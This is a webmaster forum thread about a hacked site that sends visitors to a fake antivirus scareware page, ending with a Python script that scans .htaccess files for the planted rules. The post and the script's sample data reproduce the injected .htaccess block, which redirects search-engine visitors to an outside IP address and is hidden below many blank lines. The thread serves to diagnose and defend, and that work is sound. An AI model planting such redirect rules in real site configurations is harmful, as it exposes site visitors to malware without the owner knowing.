Hi All, Hoping to get some help. I've contacted my host but they are slow. The other day a subscriber unsubscribed and told me that my site had spyware! I promptly contacted him to ask what he was doing at the time, and also proceeded to do a backup.

After doing the backup, I noticed I could download the backed-up file from my server through FTP, but not direct, i.e. if I tried to download it via a URL I got the following happening: The URL would redirect to: http://www.penbuddies.com/inc/temp/i.html An antivirus window would pop up (we've all seen these before), and then the http://www.penbuddies.com/inc/temp/i.html link would redirect to: http://scanner.win-antivir-2008.com/35/?adv=1096&ref=1105&p=1000000000

I noticed though that if I tried to download any other file it wasn't happening. I then noticed my backup file was in the root, and not in the Public_html folder, so I added a picture file to my root, tried to access that via URL and voila, the same thing as above, the antivirus nonsense, so I nailed it down to something that must be in the root. I found a file called .canna which was some weird-looking text and said it came from NEC Corporation, Tokyo, Copyright from 1992 and all sorts of BS in it. So naturally I deleted it. But the issue was still there, it didn't fix it. I checked all the other files and they are all fine.

And then I got a response from the unsubscribee. He sent me two links (which were the Aweber click tracking links) which pointed to two files, but when I clicked on them they were fine. I then told him, and funnily enough he said that they were working fine now. Hmmmm, things were getting more confusing. Still waiting for my host to respond, as it is the weekend, I have just left it.

Then today, I installed a new version of WordPress in a sub folder, and not 2 hours into editing the theme, I get the exact same antivirus nonsense when trying to update an edit. For example, I would try and update something in sidebar.php, or search.php, and after doing the edit and clicking Update, I would get forwarded to the antivirus penbuddies pages and the pop-up. I have now upgraded all scripts, maybe I was hacked through one of these. Any ideas how to find what it is so I can remove it? cheers dean
Yes, it seems he has access to the server on which your account is hosted, internally. He's able to modify directories and piggyback request attacks, which is why you are being redirected to a page infected with malware. I suggest you PM me if you are looking into securing your website. In the meantime, your host should be notified that they have indeed been breached. The redirected page is fairly buggy to your system, but the reason the attacker did this was to gain more time on his behalf to further escalate his administrative privileges.
Well, in case anyone finds they have the same issue, I have resolved it and am letting you all know how I found it. It was obvious someone got access to my server, so I have changed my password. Once in, they added the following code to my .htaccess file:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err

They also placed it so far down you had to scroll down for ages to get to it. This is why I missed it the first time. So there you have it. Thank god, as it has saved me a lot of money!!!
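The injected block above is easy to miss by eye, precisely because it was appended below hundreds of blank lines. As an added example (not code from this thread or from any of the posters), here is a small Python scan that reads an .htaccess file line by line and reports RewriteRule or ErrorDocument targets that point at a host other than the site's own, notes when the target is a bare IP address, and notes when the rule is gated on HTTP_REFERER (the search-engine-only trick used here). The SITE_HOSTS set is an assumption standing in for the site's real hostnames, and the sample file is constructed: ordinary WordPress rules, 200 blank lines, then the exact block quoted in the post.

```python
import ipaddress
from urllib.parse import urlparse

# Assumption: the hostnames this site legitimately serves. Any absolute redirect
# to another host (or to a bare IP) is treated as suspicious.
SITE_HOSTS = {"example.com", "www.example.com"}

# Constructed sample .htaccess: normal WordPress rules, a long run of blank
# lines (the attacker appended far below the visible part), then the block
# quoted in the post above.
SAMPLE_HTACCESS = (
    "# BEGIN WordPress\n"
    "RewriteEngine On\n"
    "RewriteBase /\n"
    "RewriteRule ^index\\.php$ - [L]\n"
    "RewriteCond %{REQUEST_FILENAME} !-f\n"
    "RewriteCond %{REQUEST_FILENAME} !-d\n"
    "RewriteRule . /index.php [L]\n"
    "# END WordPress\n"
    + "\n" * 200 +
    "RewriteEngine On\n"
    "RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]\n"
    "RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]\n"
    "RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]\n"
    "Errordocument 404 http://87.248.180.88/in.html?s=hg_err\n"
)


def _external_host(url, site_hosts):
    """Hostname of url if it is an absolute http(s) URL to a foreign host, else None."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.hostname:
        return None          # relative path, "-", or not a URL at all
    host = parsed.hostname.lower()
    return None if host in site_hosts else host


def _is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def scan_htaccess(text, site_hosts=SITE_HOSTS):
    """Return a list of findings ({line, directive, target, reasons}) for text."""
    findings = []
    referer_conds = 0   # RewriteCond lines waiting to attach to the next RewriteRule
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue         # blank line or comment
        directive = parts[0].lower()   # Apache directives are case-insensitive
        if directive == "rewritecond" and len(parts) >= 3:
            if parts[1].upper() in ("%{HTTP_REFERER}", "%{HTTP:REFERER}"):
                referer_conds += 1
        elif directive == "rewriterule" and len(parts) >= 3:
            host = _external_host(parts[2], site_hosts)
            if host:
                reasons = ["redirects to external host " + host]
                if _is_bare_ip(host):
                    reasons.append("target is a bare IP address")
                if referer_conds:
                    reasons.append(
                        f"gated on HTTP_REFERER by {referer_conds} condition(s)")
                findings.append({"line": lineno, "directive": "RewriteRule",
                                 "target": parts[2], "reasons": reasons})
            referer_conds = 0            # conditions are consumed by this rule
        elif directive == "errordocument" and len(parts) >= 3:
            host = _external_host(parts[2], site_hosts)
            if host:
                findings.append({"line": lineno, "directive": "ErrorDocument",
                                 "target": parts[2],
                                 "reasons": ["error page served from external host " + host]})
    return findings


if __name__ == "__main__":
    total = len(SAMPLE_HTACCESS.splitlines())
    for f in scan_htaccess(SAMPLE_HTACCESS):
        print(f"line {f['line']} of {total}: {f['directive']} -> {f['target']}")
        for reason in f["reasons"]:
            print("    " + reason)
```

Run it against a real file with `scan_htaccess(open(".htaccess").read(), {"yourdomain.example"})`; the line numbers in the output are the point, since a finding at line 216 of a file that looks eight lines long is exactly what the post describes. The same loop is a reasonable thing to run over every .htaccess under the web root after an incident, not just the top-level one.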